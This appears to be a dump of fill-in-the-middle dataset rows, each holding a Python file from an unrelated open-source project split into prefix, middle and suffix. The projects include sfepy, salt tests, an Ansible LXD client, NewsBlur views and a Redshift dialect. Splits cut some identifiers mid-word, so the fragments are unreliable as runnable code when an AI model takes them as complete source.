| repo_name | path | language | license | size | score | prefix | middle | suffix |
|---|---|---|---|---|---|---|---|---|
| stringlengths 5-100 | stringlengths 4-231 | stringclasses (1 value) | stringclasses (15 values) | int64 6-947k | float64 0-0.34 | stringlengths 0-8.16k | stringlengths 3-512 | stringlengths 0-8.17k |

RexFuzzle/sfepy | sfepy/terms/terms_basic.py | Python | bsd-3-clause | size 12,864 | score 0.003887

import numpy as nm
from sfepy.base.base import assert_
from sfepy.linalg import dot_sequences
from sfepy.terms.terms import Term, terms
class IntegrateVolumeTerm(Term):
r"""
Evaluate (weighted) variable in a volume region.
Depending on evaluation mode, integrate a variable over a volume region
('eval'), average it in elements ('el_avg') or interpolate it into volume
quadrature points ('qp').
Supports 'eval', 'el_avg' and 'qp' evaluation modes.
:Definition:
.. math::
\int_\Omega y \mbox{ , } \int_\Omega \ul{y} \\
\int_\Omega c y \mbox{ , } \int_\Omega c \ul{y}
.. math::
\mbox{vector for } K \from \Ical_h:
\int_{T_K} y / \int_{T_K} 1 \mbox{ , }
\int_{T_K} \ul{y} / \int_{T_K} 1 \\
\mbox{vector for } K \from \Ical_h:
\int_{T_K} c y / \int_{T_K} 1 \mbox{ , }
\int_{T_K} c \ul{y} / \int_{T_K} 1
.. math::
y|_{qp} \mbox{ , } \ul{y}|_{qp} \\
c y|_{qp} \mbox{ , } c \ul{y}|_{qp}
:Arguments:
- material : :math:`c` (optional)
- parameter : :math:`y` or :math:`\ul{y}`
"""
name = 'ev_volume_integrate'
arg_types = ('opt_material', 'parameter')
arg_shapes = [{'opt_material' : '1, 1', 'parameter' : 1},
{'opt_material' : None},
{'opt_material' : '1, 1', 'parameter' : 'D'},
{'opt_material' : None}]
@staticmethod
def function(out, val_qp, vg, fmode):
if fmode == 2:
out[:] = val_qp
status = 0
else:
status = vg.integrate(out, val_qp, fmode)
return status
def get_fargs(self, material, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
vg, _ = self.get_mapping(parameter)
val_qp = self.get(parameter, 'val')
if material is not None:
val_qp *= material
fmode = {'eval' : 0, 'el_avg' : 1, 'qp' : 2}.get(mode, 1)
return val_qp, vg, fmode
def get_eval_shape(self, material, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_el, n_qp, dim, n_en, n_c = self.get_data_shape(parameter)
if mode != 'qp':
n_qp = 1
return (n_el, n_qp, n_c, 1), parameter.dtype
class IntegrateSurfaceTerm(Term):
r"""
Evaluate (weighted) variable in a surface region.
Depending on evaluation mode, integrate a variable over a surface region
('eval'), average it in element faces ('el_avg') or interpolate it into
surface quadrature points ('qp'). For vector variables, setting `term_mode`
to `'flux'` leads to computing corresponding fluxes for the three modes
instead.
Supports 'eval', 'el_avg' and 'qp' evaluation modes.
:Definition:
.. math::
\int_\Gamma y \mbox{ , } \int_\Gamma \ul{y}
\mbox{ , } \int_\Gamma \ul{y} \cdot \ul{n} \\
\int_\Gamma c y \mbox{ , } \int_\Gamma c \ul{y}
\mbox{ , } \int_\Gamma c \ul{y} \cdot \ul{n} \mbox{ flux }
.. math::
\mbox{vector for } K \from \Ical_h:
\int_{T_K} y / \int_{T_K} 1 \mbox{ , }
\int_{T_K} \ul{y} / \int_{T_K} 1 \mbox{ , }
\int_{T_K} (\ul{y} \cdot \ul{n}) / \int_{T_K} 1 \\
\mbox{vector for } K \from \Ical_h:
\int_{T_K} c y / \int_{T_K} 1 \mbox{ , }
\int_{T_K} c \ul{y} / \int_{T_K} 1 \mbox{ , }
\int_{T_K} (c \ul{y} \cdot \ul{n}) / \int_{T_K} 1
.. math::
y|_{qp} \mbox{ , } \ul{y}|_{qp}
\mbox{ , } (\ul{y} \cdot \ul{n})|_{qp} \mbox{ flux } \\
c y|_{qp} \mbox{ , } c \ul{y}|_{qp}
\mbox{ , } (c \ul{y} \cdot \ul{n})|_{qp} \mbox{ flux }
:Arguments:
- material : :math:`c` (optional)
- parameter : :math:`y` or :math:`\ul{y}`
"""
name = 'ev_surface_integrate'
arg_types = ('opt_material', 'parameter')
arg_shapes = [{'opt_material' : '1, 1', 'parameter' : 1},
{'opt_material' : None},
{'opt_material' : '1, 1', 'parameter' : 'D'},
{'opt_material' : None}]
integration = 'surface'
@staticmethod
def function(out, val_qp, sg, fmode):
if fmode == 2:
out[:] = val_qp
status = 0
elif fmode == 5:
normal = sg.normal
out[:] = dot_sequences(val_qp, normal)
status = 0
else:
status = sg.integrate(out, val_qp, fmode)
return status
def get_fargs(self, material, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
sg, _ = self.get_mapping(parameter)
val_qp = self.get(parameter, 'val')
if material is not None:
val_qp *= material
fmode = {'eval' : 0, 'el_avg' : 1, 'qp' : 2}.get(mode, 1)
if term_mode == 'flux':
n_fa, n_qp, dim, n_fn, n_c = self.get_data_shape(parameter)
if n_c == dim:
fmode += 3
return val_qp, sg, fmode
def get_eval_shape(self, material, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_fa, n_qp, dim, n_fn, n_c = self.get_data_shape(parameter)
if mode != 'qp':
n_qp = 1
if term_mode == 'flux':
n_c = 1
return (n_fa, n_qp, n_c, 1), parameter.dtype
class IntegrateVolumeOperatorTerm(Term):
r"""
Volume integral of a test function weighted by a scalar function
:math:`c`.
:Definition:
.. math::
\int_\Omega q \mbox{ or } \int_\Omega c q
:Arguments:
- material : :math:`c` (optional)
- virtual : :math:`q`
"""
name = 'dw_volume_integrate'
arg_types = ('opt_material', 'virtual')
arg_shapes = [{'opt_material' : '1, 1', 'virtual' : (1, None)},
{'opt_material' : None}]
@staticmethod
def function(out, material, bf, geo):
bf_t = nm.tile(bf.transpose((0, 1, 3, 2)), (out.shape[0], 1, 1, 1))
bf_t = nm.ascontiguousarray(bf_t)
if material is not None:
status = geo.integrate(out, material * bf_t)
else:
status = geo.integrate(out, bf_t)
return status
def get_fargs(self, material, virtual,
mode=None, term_mode=None, diff_var=None, **kwargs):
assert_(virtual.n_components == 1)
geo, _ = self.get_mapping(virtual)
return material, geo.bf, geo
class IntegrateSurfaceOperatorTerm(IntegrateVolumeOperatorTerm):
r"""
Surface integral of a test function weighted by a scalar function
:math:`c`.
:Definition:
.. math::
\int_{\Gamma} q \mbox{ or } \int_\Gamma c q
:Arguments:
- material : :math:`c` (optional)
- virtual : :math:`q`
"""
name = 'dw_surface_integrate'
arg_types = ('opt_material', 'virtual')
arg_shapes = [{'opt_material' : '1, 1', 'virtual' : (1, None)},
{'opt_material' : None}]
integration = 'surface'
class VolumeTerm(Term):
r"""
Volume of a domain. Uses approximation of the parameter variable.
:Definition:
.. math::
\int_\Omega 1
:Arguments:
- parameter : any variable
"""
name = 'd_volume'
arg_types = ('parameter',)
arg_shapes = {'parameter' : 1}
@staticmethod
def function(out, geo):
out[:] = geo.volume
return 0
def get_fargs(self, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
geo, _ = self.get_mapping(parameter)
return geo,
def get_eval_shape(self, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_cell, n_qp, dim, n_n, n_c = self.get_data_shape(parameter)
return (n_cell, 1, 1, 1), parameter.dtype
class SurfaceTerm(VolumeTerm):
r"""
Surface of a domain. Uses approximation of the parameter variable.
:Definition:
.. math::
\int_\Gamma 1
:Arguments:
- parameter : any variable
"""
name = 'd_surface'
arg_types = ('parameter',)
arg_shapes = {'parameter' : 1}
integration = 'surface'
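
A minimal usage sketch, not part of the original file: in sfepy, terms like these are usually evaluated through a problem object's `evaluate` call. The problem `pb`, quadrature order `2`, region `Omega`, and variable `p` below are assumed to come from a surrounding problem definition.

```python
# Hedged sketch: element-average a scalar variable p over the region Omega
# using the ev_volume_integrate term defined above.
avg = pb.evaluate("ev_volume_integrate.2.Omega(p)", mode='el_avg')
```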

saltstack/salt | tests/unit/test_fileserver.py | Python | apache-2.0 | size 2,610 | score 0.000766

"""
:codeauthor: Joao Mesquita <jmesquita@sangoma.com>
"""
import datetime
import os
import time
import salt.utils.files
from salt import fileserver
from tests.support.helpers import with_tempdir
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase
class MapDiffTestCase(TestCase):
def test_diff_with_different_keys(self):
    """
    Test that maps with different keys are reported as different
    """
map1 = {"file1": 1234}
map2 = {"file2": 1234}
assert fileserver.diff_mtime_map(map1, map2) is True
def test_diff_with_different_values(self):
    """
    Test that maps with different values are reported as different
    """
map1 = {"file1": 12345}
map2 = {"file1": 1234}
assert fileserver.diff_mtime_map(map1, map2) is True
class VCSBackendWhitelistCase(TestCase, LoaderModuleMockMixin):
def setup_loader_modules(self):
return {fileserver: {}}
def test_whitelist(self):
opts = {
"fileserver_backend": ["roots", "git", "s3fs", "hgfs", "svn"],
"extension_modules": "",
}
fs = fileserver.Fileserver(opts)
assert sorted(fs.servers.whitelist) == sorted(
["git", "gitfs", "hg", "hgfs", "svn", "svnfs", "roots", "s3fs"]
), fs.servers.whitelist
@with_tempdir()
def test_future_file_list_cache_file_ignored(self, cachedir):
opts = {
"fileserver_backend": ["roots"],
"cachedir": cachedir,
"extension_modules": "",
}
back_cachedir = os.path.join(cachedir, "file_lists/roots")
os.makedirs(os.path.join(back_cachedir))
# Touch a couple files
for filename in ("base.p", "foo.txt"):
with salt.utils.files.fopen(
os.path.join(back_cachedir, filename), "wb"
) as _f:
if filename == "base.p":
_f.write(b"\x80")
# Set modification time to file list cache file to 1 year in the future
now = datetime.datetime.utcnow()
future = now + datetime.timedelta(days=365)
mod_time = time.mktime(future.timetuple())
os.utime(os.path.join(back_cachedir, "base.p"), (mod_time, mod_time))
list_cache = os.path.join(back_cachedir, "base.p")
w_lock = os.path.join(back_cachedir, ".base.w")
ret = fileserver.check_file_list_cache(opts, "files", list_cache, w_lock)
assert (
ret[1] is True
), "Cache file list cache file is not refreshed when future modification time"

rosegun38/LintCode | Two_Strings_Are_Anagrams/Solution.py | Python | gpl-3.0 | size 307 | score 0

class Solution:
"""
@param s: The first string
@param t: The second string
@return true or false
"""
# Time: is equal to sorted O(nlogn)
# Space: O(1)
def anagram(self, s, t):
# write your code here
s = sorted(s)
t = sorted(t)
return s == t
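
A quick usage sketch for the class above, with illustrative inputs:

```python
# Sorting both strings costs O(n log n); equal sorted forms mean anagrams.
sol = Solution()
print(sol.anagram("listen", "silent"))  # True
print(sol.anagram("hello", "world"))    # False
```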

yaolei313/python-study | base/test.py | Python | gpl-2.0 | size 365 | score 0.00554

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
sql_template0 = """alter table _shadow_orders_{0}_ modify fingerprint text DEFAULT '' COMMENT '下单fingerprint';"""
if __name__ == '__main__':
for index in range(0, 50):
print(sql_template0.format(index))
print("------")
for index in range(50, 100):
print(sql_template0.format(index))

SublimeText/VintageEx | plat/__init__.py | Python | mit | size 109 | score 0

import sublime
HOST_PLATFORM = sublime.platform()
WINDOWS = 'windows'
LINUX = 'linux'
OSX = 'osx'

camradal/ansible | lib/ansible/module_utils/lxd.py | Python | gpl-3.0 | size 6,180 | score 0.004045

# -*- coding: utf-8 -*-
# (c) 2016, Hiroaki Nakamura <hnakamur@gmail.com>
#
# This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
try:
import json
except ImportError:
import simplejson as json
# httplib/http.client connection using unix domain socket
import socket
import ssl
try:
from httplib import HTTPConnection, HTTPSConnection
except ImportError:
# Python 3
from http.client import HTTPConnection, HTTPSConnection
class UnixHTTPConnection(HTTPConnection):
def __init__(self, path):
HTTPConnection.__init__(self, 'localhost')
self.path = path
def connect(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(self.path)
self.sock = sock
from ansible.module_utils.urls import generic_urlparse
try:
from urlparse import urlparse
except ImportError:
# Python 3
from urllib.parse import urlparse
class LXDClientException(Exception):
def __init__(self, msg, **kwargs):
self.msg = msg
self.kwargs = kwargs
class LXDClient(object):
def __init__(self, url, key_file=None, cert_file=None, debug=False):
"""LXD Client.
:param url: The URL of the LXD server. (e.g. unix:/var/lib/lxd/unix.socket or https://127.0.0.1)
:type url: ``str``
:param key_file: The path of the client certificate key file.
:type key_file: ``str``
:param cert_file: The path of the client certificate file.
:type cert_file: ``str``
:param debug: The debug flag. The request and response are stored in logs when debug is true.
:type debug: ``bool``
"""
self.url = url
self.debug = debug
self.logs = []
if url.startswith('https:'):
self.cert_file = cert_file
self.key_file = key_file
parts = generic_urlparse(urlparse(self.url))
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ctx.load_cert_chain(cert_file, keyfile=key_file)
self.connection = HTTPSConnection(parts.get('netloc'), context=ctx)
elif url.startswith('unix:'):
unix_socket_path = url[len('unix:'):]
self.connection = UnixHTTPConnection(unix_socket_path)
else:
raise LXDClientException('URL scheme must be unix: or https:')
def do(self, method, url, body_json=None, ok_error_codes=None, timeout=None):
resp_json = self._send_request(method, url, body_json=body_json, ok_error_codes=ok_error_codes, timeout=timeout)
if resp_json['type'] == 'async':
url = '{0}/wait'.format(resp_json['operation'])
resp_json = self._send_request('GET', url)
if resp_json['metadata']['status'] != 'Success':
    self._raise_err_from_json(resp_json)
return resp_json
def authenticate(self, trust_password):
body_json = {'type': 'client', 'password': trust_password}
return self._send_request('POST', '/1.0/certificates', body_json=body_json)
def _send_request(self, method, url, body_json=None, ok_error_codes=None, timeout=None):
try:
body = json.dumps(body_json)
self.connection.request(method, url, body=body)
resp = self.connection.getresponse()
resp_json = json.loads(resp.read())
self.logs.append({
'type': 'sent request',
'request': {'method': method, 'url': url, 'json': body_json, 'timeout': timeout},
'response': {'json': resp_json}
})
resp_type = resp_json.get('type', None)
if resp_type == 'error':
if ok_error_codes is not None and resp_json['error_code'] in ok_error_codes:
return resp_json
if resp_json['error'] == "Certificate already in trust store":
return resp_json
self._raise_err_from_json(resp_json)
return resp_json
except socket.error as e:
raise LXDClientException('cannot connect to the LXD server', err=e)
def _raise_err_from_json(self, resp_json):
err_params = {}
if self.debug:
err_params['logs'] = self.logs
raise LXDClientException(self._get_err_from_resp_json(resp_json), **err_params)
@staticmethod
def _get_err_from_resp_json(resp_json):
err = None
metadata = resp_json.get('metadata', None)
if metadata is not None:
err = metadata.get('err', None)
if err is None:
err = resp_json.get('error', None)
return err
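
A minimal usage sketch for the client above, assuming a local LXD daemon listening on the default unix socket path mentioned in the docstring:

```python
# Hedged sketch: query the LXD API root over the unix domain socket.
client = LXDClient('unix:/var/lib/lxd/unix.socket', debug=True)
resp = client.do('GET', '/1.0')
print(resp['metadata'])
```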

htimko/ArcPIC | pic2d/tests/rngtestAna.py | Python | gpl-3.0 | size 571 | score 0.019264

#!/usr/bin/env python
import matplotlib.pyplot as plt
import os
import math as m
import numpy as np
def Gaus(v,mu,sigma):
"Gaus
|
sian distribution"
return np.exp(-0.5*((v-mu)/sigma)**2)/(sigma*m.sqrt(2*m.pi))
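# Illustrative check (not in the original source): at v == mu the density
# peaks at 1/(sigma*sqrt(2*pi)); for sigma = 1.5 that is roughly 0.266.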
mu = 0.5;
sigma = 1.5;
print "reading file..."
gausFile = open("gausRandom.out", 'r')
gausNums = map(float,gausFile.read().split())
gausFile.close()
gausBins = np.linspace(mu-5*sigma, mu+5*sigma);
gausPoints = gausBins[:-1] - np.diff(gausBins)
plt.hist(gausNums,bins=gausBins,normed=True);
plt.plot(gausPoints, Gaus(gausPoints, mu, sigma))
plt.show()

BechtelCIRT/pivoteer | pivoteer/__init__.py | Python | mit | size 74 | score 0

from pivoteer import *
from pivotEngine import *
from pivotUtils import *

lmazuel/azure-sdk-for-python | azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/application_gateway_backend_address_pool.py | Python | mit | size 2,589 | score 0.001545

# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewayBackendAddressPool(SubResource):
"""Backend Address Pool of an application gateway.
:param id: Resource ID.
:type id: str
:param backend_ip_configurations: Collection of references to IPs defined
in network interfaces.
:type backend_ip_configurations:
list[~azure.mgmt.network.v2018_01_01.models.NetworkInterfaceIPConfiguration]
:param backend_addresses: Backend addresses
:type backend_addresses:
list[~azure.mgmt.network.v2018_01_01.models.ApplicationGatewayBackendAddress]
:param provisioning_state: Provisioning state of the backend address pool
resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:type provisioning_state: str
:param name: Resource that is unique within a resource group. This name
can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
:param type: Type of the resource.
:type type: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'backend_ip_configurations': {'key': 'properties.backendIPConfigurations', 'type': '[NetworkInterfaceIPConfiguration]'},
'backend_addresses': {'key': 'properties.backendAddresses', 'type': '[ApplicationGatewayBackendAddress]'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, **kwargs):
super(ApplicationGatewayBackendAddressPool, self).__init__(**kwargs)
self.backend_ip_configurations = kwargs.get('backend_ip_configurations', None)
self.backend_addresses = kwargs.get('backend_addresses', None)
self.provisioning_state = kwargs.get('provisioning_state', None)
self.name = kwargs.get('name', None)
self.etag = kwargs.get('etag', None)
self.type = kwargs.get('type', None)
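
A construction sketch for the generated model above; every keyword value is illustrative:

```python
# Hedged sketch: AutoRest-generated models are populated via **kwargs.
pool = ApplicationGatewayBackendAddressPool(
    name='pool1',
    backend_addresses=[{'ip_address': '10.0.0.4'}],  # illustrative address
)
print(pool.name, pool.etag)  # -> pool1 None
```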

matt-jordan/mjmud | lib/transports/ws_receiver.py | Python | mit | size 1,886 | score 0

#
# mjmud - The neverending MUD project
#
# Copyright (c) 2014, Matt Jordan
#
# See https://github.com/matt-jordan/mjmud for more information about the
# project. Please do not contact the maintainers of the project for information
# or assistance. The project uses Github for these purposes.
#
# This program is free software, distributed under the conditions of the MIT
# License (MIT). See the LICENSE file at the top of the source tree for
# details.
from zope.interface import Interface
class IWebSocketReceiver(Interface):
def on_message_received(protocol, json_msg):
"""Receive and process a JSON message
Keyword Arguments:
protocol -- the websocket protocol that received the JSON message
json_msg -- the JSON object received from the protocol's peer
"""
def on_connected(protocol, peer):
"""Called when a connection is established
Keyword Arguments:
protocol -- the websocket protocol that is serving the peer
peer -- the peer that connected
"""
def on_closed(protocol, was_clean, code, reason):
"""Called when a connection is closed
Keyword Arguments:
protocol -- the websocket protocol that disconnected
was_clean -- true if the handshake occurred; false otherwise
code -- numeric code describing the disconnection
reason -- why the disconnection occurred
"""
class IWebSocketClientReceiver(Interface):
def on_connection_failed(protocol, connector, reason):
"""Called when a client connection fails
Keyword Arguments:
protocol -- the websocket client protocol that failed
connector -- the connection object
reason -- why the connection failed
"""
class ReceiverError(Exception):
"""An exception occurred in a protocol receiver"""
pass
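
A sketch of a concrete receiver implementing the interface above, using zope.interface's standard `implementer` decorator; the echo behaviour and the `sendMessage` call are illustrative assumptions:

```python
from zope.interface import implementer

@implementer(IWebSocketReceiver)
class EchoReceiver(object):
    def on_message_received(self, protocol, json_msg):
        # Illustrative: echo every JSON message back to the peer.
        protocol.sendMessage(json_msg)

    def on_connected(self, protocol, peer):
        print('connected: %s' % (peer,))

    def on_closed(self, protocol, was_clean, code, reason):
        print('closed (%s): %s' % (code, reason))
```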

nriley/NewsBlur | apps/rss_feeds/views.py | Python | mit | size 21,500 | score 0.005302

import datetime
from urlparse import urlparse
from utils import log as logging
from django.shortcuts import get_object_or_404, render_to_response
from django.views.decorators.http import condition
from django.http import HttpResponseForbidden, HttpResponseRedirect, HttpResponse, Http404
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
# from django.db import IntegrityError
from apps.rss_feeds.models import Feed, merge_feeds
from apps.rss_feeds.models import MFetchHistory
from apps.rss_feeds.models import MFeedIcon
from apps.push.models import PushSubscription
from apps.analyzer.models import get_classifiers_for_user
from apps.reader.models import UserSubscription
from apps.rss_feeds.models import MStory
from utils.user_functions import ajax_login_required
from utils import json_functions as json, feedfinder2 as feedfinder
from utils.feed_functions import relative_timeuntil, relative_timesince
from utils.user_functions import get_user
from utils.view_functions import get_argument_or_404
from utils.view_functions import required_params
from utils.view_functions import is_true
from vendor.timezones.utilities import localtime_for_timezone
from utils.ratelimit import ratelimit
IGNORE_AUTOCOMPLETE = [
"facebook.com/feeds/notifications.php",
"inbox",
"secret",
"password",
"latitude",
]
@ajax_login_required
@json.json_view
def search_feed(request):
address = request.REQUEST.get('address')
offset = int(request.REQUEST.get('offset', 0))
if not address:
return dict(code=-1, message="Please provide a URL/address.")
logging.user(request.user, "~FBFinding feed (search_feed): %s" % address)
ip = request.META.get('HTTP_X_FORWARDED_FOR', None) or request.META['REMOTE_ADDR']
logging.user(request.user, "~FBIP: %s" % ip)
aggressive = request.user.is_authenticated()
feed = Feed.get_feed_from_url(address, create=False, aggressive=aggressive, offset=offset)
if feed:
return feed.canonical()
else:
return dict(code=-1, message="No feed found matching that XML or website address.")
@json.json_view
def load_single_feed(request, feed_id):
user = get_user(request)
feed = get_object_or_404(Feed, pk=feed_id)
classifiers = get_classifiers_for_user(user, feed_id=feed.pk)
payload = feed.canonical(full=True)
payload['classifiers'] = classifiers
return payload
def feed_favicon_etag(request, feed_id):
try:
feed_icon = MFeedIcon.objects.get(feed_id=feed_id)
except MFeedIcon.DoesNotExist:
return
return feed_icon.color
@condition(etag_func=feed_favicon_etag)
def load_feed_favicon(request, feed_id):
not_found = False
try:
feed_icon = MFeedIcon.objects.get(feed_id=feed_id)
except MFeedIcon.DoesNotExist:
not_found = True
if not_found or not feed_icon.data:
return HttpResponseRedirect(settings.MEDIA_URL + 'img/icons/circular/world.png')
icon_data = feed_icon.data.decode('base64')
return HttpResponse(icon_data, mimetype='image/png')
@json.json_view
def feed_autocomplete(request):
query = request.GET.get('term') or request.GET.get('query')
version = int(request.GET.get('v', 1))
format = request.GET.get('format', 'autocomplete')
# user = get_user(request)
# if True or not user.profile.is_premium:
# return dict(code=-1, message="Overloaded, no autocomplete results.", feeds=[], term=query)
if not query:
return dict(code=-1, message="Specify a search 'term'.", feeds=[], term=query)
if '.' in query:
try:
parts = urlparse(query)
if not parts.hostname and not query.startswith('http'):
parts = urlparse('http://%s' % query)
if parts.hostname:
query = [parts.hostname]
query.extend([p for p in parts.path.split('/') if p])
query = ' '.join(query)
except:
logging.user(request, "~FGAdd search, could not parse url in ~FR%s" % query)
query_params = query.split(' ')
tries_left = 5
while len(query_params) and tries_left:
tries_left -= 1
feed_ids = Feed.autocomplete(' '.join(query_params))
if feed_ids:
break
else:
query_params = query_params[:-1]
feeds = list(set([Feed.get_by_id(feed_id) for feed_id in feed_ids]))
feeds = [feed for feed in feeds if feed and not feed.branch_from_feed]
feeds = [feed for feed in feeds if all([x not in feed.feed_address for x in IGNORE_AUTOCOMPLETE])]
if format == 'autocomplete':
feeds = [{
'id': feed.pk,
'value': feed.feed_address,
'label': feed.feed_title,
'tagline': feed.data and feed.data.feed_tagline,
'num_subscribers': feed.num_subscribers,
} for feed in feeds]
else:
feeds = [feed.canonical(full=True) for feed in feeds]
feeds = sorted(feeds, key=lambda f: -1 * f['num_subscribers'])
feed_ids = [f['id'] for f in feeds]
feed_icons = dict((icon.feed_id, icon) for icon in MFeedIcon.objects.filter(feed_id__in=feed_ids))
for feed in feeds:
if feed['id'] in feed_icons:
feed_icon = feed_icons[feed['id']]
if feed_icon.data:
feed['favicon_color'] = feed_icon.color
feed['favicon'] = feed_icon.data
logging.user(request, "~FGAdd Search: ~SB%s ~SN(%s matches)" % (query, len(feeds),))
if version > 1:
return {
'feeds': feeds,
'term': query,
}
else:
return feeds
@ratelimit(minutes=1, requests=30)
@json.json_view
def load_feed_statistics(request, feed_id):
user = get_user(request)
timezone = user.profile.timezone
stats = dict()
feed = get_object_or_404(Feed, pk=feed_id)
feed.update_all_statistics()
feed.set_next_scheduled_update(verbose=True, skip_scheduling=True)
feed.save_feed_story_history_statistics()
feed.save_classifier_counts()
# Dates of last and next update
stats['active'] = feed.active
stats['last_update'] = relative_timesince(feed.last_update)
stats['next_update'] = relative_timeuntil(feed.next_scheduled_update)
stats['push'] = feed.is_push
if feed.is_push:
try:
stats['push_expires'] = localtime_for_timezone(feed.push.lease_expires,
                                               timezone).strftime("%Y-%m-%d %H:%M:%S")
except PushSubscription.DoesNotExist:
stats['push_expires'] = 'Missing push'
feed.is_push = False
feed.save()
# Minutes between updates
update_interval_minutes = feed.get_next_scheduled_update(force=True, verbose=False)
stats['update_interval_minutes'] = update_interval_minutes
original_active_premium_subscribers = feed.active_premium_subscribers
original_premium_subscribers = feed.premium_subscribers
feed.active_premium_subscribers = max(feed.active_premium_subscribers+1, 1)
feed.premium_subscribers += 1
premium_update_interval_minutes = feed.get_next_scheduled_update(force=True, verbose=False,
premium_speed=True)
feed.active_premium_subscribers = original_active_premium_subscribers
feed.premium_subscribers = original_premium_subscribers
stats['premium_update_interval_minutes'] = premium_update_interval_minutes
stats['errors_since_good'] = feed.errors_since_good
# Stories per month - average and month-by-month breakout
average_stories_per_month, story_count_history = feed.average_stories_per_month, feed.data.story_count_history
stats['average_stories_per_month'] = average_stories_per_month
story_count_history = story_count_history and json.decode(story_count_history)
if story_count_history and isinstance(story_count_history, dict):
stats['story_count_history'] = story_count_history['months']
stats['story_days_history'] = sto

ScholarTools/pypub | pypub/entry_functions.py | Python | mit | size 1,300 | score 0.009231

import pypub.publishers.pub_resolve as pub_resolve
from pypub.paper_info import PaperInfo
def get_paper_info(doi=None, url=None):
"""
Parameters
----------
doi :
url :
Returns
-------
Errors
------
UnsupportedPublisherError : Retrieval of information from this publisher is not yet available
"""
if doi is not None:
publisher = pub_resolve.publisher_from_doi(doi)
paper_info = publisher.get_paper_info(doi=doi)
elif url is not None:
publisher = pub_resolve.publisher_from_url(url)
paper_info = publisher.get_paper_info(url=url)
else:
raise Exception
'''
# Resolve DOI or URL through PyPub pub_resolve methods
publisher_base_url, full_url = pub_resolve.get_publisher_urls(doi=doi, url=url)
pub_dict = pub_resolve.get_publisher_site_info(publisher_base_url)
# Create a PaperInfo object to hold all information and call appropriate scraper
paper_info = PaperInfo(doi=doi, scraper_obj=pub_dict['object'], url=full_url)
paper_info.populate_info()
'''
return paper_info
def get_references():
pass
def get_publisher(doi=None, url=None):
#This could return the publisher given this information.
#This function is low priority
pass
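
A usage sketch for `get_paper_info` above; the DOI and URL are placeholders:

```python
# Hedged sketch: resolve a paper either by DOI or by URL.
info = get_paper_info(doi='10.1000/example.doi')
# info = get_paper_info(url='https://publisher.example/article/123')
```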

bouk/redshift_sqlalchemy | redshift_sqlalchemy/dialect.py | Python | mit | size 34,694 | score 0.000461

from collections import defaultdict
import numbers
import pkg_resources
import re
import sqlalchemy as sa
from sqlalchemy import schema, exc, inspect, Column
from sqlalchemy.dialects.postgresql.base import PGDDLCompiler, PGCompiler
from sqlalchemy.dialects.postgresql.psycopg2 import PGDialect_psycopg2
from sqlalchemy.engine import reflection
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.sql.expression import BindParameter, Executable, ClauseElement
from sqlalchemy.types import VARCHAR, NullType
try:
from alembic.ddl import postgresql
except ImportError:
pass
else:
from alembic.ddl.base import RenameTable
compiles(RenameTable, 'redshift')(postgresql.visit_rename_table)
class RedshiftImpl(postgresql.PostgresqlImpl):
__dialect__ = 'redshift'
# Regex for parsing and identity constraint out of adsrc, e.g.:
# "identity"(445178, 0, '1,1'::text)
IDENTITY_RE = re.compile(r"""
"identity" \(
(?P<current>-?\d+)
,\s
(?P<base>-?\d+)
,\s
'(?P<seed>-?\d+),(?P<step>-?\d+)'
.*
\)
""", re.VERBOSE)
# Regex for SQL identifiers (valid table and column names)
SQL_IDENTIFIER_RE = re.compile(r"""
[_a-zA-Z][\w$]* # SQL standard identifier
| # or
(?:"[^"]+")+ # SQL delimited (quoted) identifier
""", re.VERBOSE)
# Regex for foreign key constraints, e.g.:
# FOREIGN KEY(col1) REFERENCES othertable (col2)
